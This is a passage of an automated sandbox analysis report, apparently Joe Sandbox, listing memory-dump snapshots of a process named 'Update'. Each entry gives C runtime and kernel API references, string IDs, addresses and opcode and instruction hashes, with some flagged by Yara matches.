                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFrame@12Setting__getptd
                                                                                            • String ID: j
                                                                                            • API String ID: 3454690891-2137352139
                                                                                            • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                            • Instruction ID: 18f9f0e6d090931ded57ad948dea8415f10ae16f2c647bf28b6bb61ac168674b
                                                                                            • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                            • Instruction Fuzzy Hash: 2111AD71D00268DBCB12EF58D4853ACBB70BF01314F24C1C9E4592B6A3C378AE91CB91
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 009237AF
                                                                                              • Part of subcall function 009198E6: __getptd_noexit.LIBCMT ref: 009198E9
                                                                                              • Part of subcall function 009198E6: __amsg_exit.LIBCMT ref: 009198F6
                                                                                            • __getptd.LIBCMT ref: 009237BD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: csm
                                                                                            • API String ID: 803148776-1018135373
                                                                                            • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                            • Instruction ID: 4f97e6effbdf0bee96d48cb2deb6d38f8ca1afa896260c00754fcaed5623d372
                                                                                            • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                            • Instruction Fuzzy Hash: AE014674800225CACF38AF21E544AACB3F9AF54311F64C86EF4949A695DB388B81DB61
                                                                                            APIs
                                                                                              • Part of subcall function 0350010A: __getptd.LIBCMT ref: 03500110
                                                                                              • Part of subcall function 0350010A: __getptd.LIBCMT ref: 03500120
                                                                                            • __getptd.LIBCMT ref: 035006E3
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                            • __getptd.LIBCMT ref: 035006F1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: csm
                                                                                            • API String ID: 803148776-1018135373
                                                                                            • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                            • Instruction ID: 62f56c5b54402e7518d6c271d6bdd4a1a8f12e1365434bc4bda0be2fee1c66d9
                                                                                            • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                            • Instruction Fuzzy Hash: 380174388003028ECF74DF21E4847AEB3B9BF00210F68486ED8899B2E0CB3A8580CE41
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 030600A2
                                                                                              • Part of subcall function 0305381A: __getptd_noexit.LIBCMT ref: 0305381D
                                                                                              • Part of subcall function 0305381A: __amsg_exit.LIBCMT ref: 0305382A
                                                                                            • __getptd.LIBCMT ref: 030600B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: csm
                                                                                            • API String ID: 803148776-1018135373
                                                                                            • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                            • Instruction ID: 5563dcf46cfff720aada6736313df8370cb5f2740e12cc22e9e0b620587df681
                                                                                            • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                            • Instruction Fuzzy Hash: 5A01623884A306DBCFB4DF68C4406ADB7F9AF40211F58845EE4C29E554DF7495D1CB01
                                                                                            APIs
                                                                                            • AcquireSRWLockExclusive.KERNEL32(6C3BC354,?,G.7l,?,6C37233F,6C3BC244,ios_base::badbit set,?,6C372E47,?,00000001), ref: 6C38AA9B
                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6C3BC354,?,6C37233F,6C3BC244,ios_base::badbit set,?,6C372E47,?,00000001,?,?,?,?,?,?,?), ref: 6C38AAD5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExclusiveLock$AcquireRelease
                                                                                            • String ID: G.7l
                                                                                            • API String ID: 17069307-3243727157
                                                                                            • Opcode ID: 990635face0d2ce2147501b76bdfafa7711a718aefb697d3a374dacb10d96215
                                                                                            • Instruction ID: abe3265b370652b19c930b3fed04307b5a44a266f2eedb076aea6e16febc118b
                                                                                            • Opcode Fuzzy Hash: 990635face0d2ce2147501b76bdfafa7711a718aefb697d3a374dacb10d96215
                                                                                            • Instruction Fuzzy Hash: A8F08C35202245CFCB219F18C544A68B7B8FF87B38F24022AE9A547EC0D73D2842CE61